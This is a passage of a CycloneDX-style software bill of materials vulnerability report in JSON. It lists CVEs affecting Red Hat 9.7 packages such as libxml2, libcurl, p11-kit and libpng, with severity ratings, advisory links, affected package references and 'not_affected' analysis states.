          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757"
        }
      ],
      "published": "2026-02-02T13:15:58+00:00",
      "updated": "2026-04-22T10:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1965",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        305
      ],
      "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\na Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason is that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1965"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1965"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.json"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
        }
      ],
      "published": "2026-03-11T11:15:59+00:00",
      "updated": "2026-03-12T14:11:19+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-2100",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        824
      ],
      "description": "A flaw was found in p11-kit. A remote attacker could exploit this vulnerability by calling the C_DeriveKey function on a remote token with specific IBM kyber or IBM btc derive mechanism parameters set to NULL. This could lead to the RPC-client attempting to return an uninitialized value, potentially resulting in a NULL dereference or undefined behavior. This issue may cause an application level denial of service or other unpredictable system states.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2100"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7065"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2100"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437308"
        },
        {
          "url": "https://github.com/p11-glue/p11-kit/pull/740"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2100"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2100"
        }
      ],
      "published": "2026-03-26T21:17:04+00:00",
      "updated": "2026-04-25T02:16:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.25.3-3.el9_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.25.3-3.el9_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-22020",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
        }
      ],
      "description": "No description is available for this CVE.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22020"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22020"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22020"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22020"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-12.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2"
        },
